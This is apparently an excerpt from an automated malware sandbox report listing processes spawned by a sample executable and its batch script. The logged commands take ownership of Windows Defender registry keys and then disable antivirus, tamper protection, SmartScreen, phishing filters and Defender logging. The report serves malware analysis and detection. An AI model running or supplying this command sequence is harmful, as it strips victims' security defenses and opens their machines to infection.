Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Users\user\Desktop\P196hUN2fw.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Users\user\Desktop\P196hUN2fw.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat | Jump to behavior |
Source: C:\Users\user\Desktop\P196hUN2fw.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |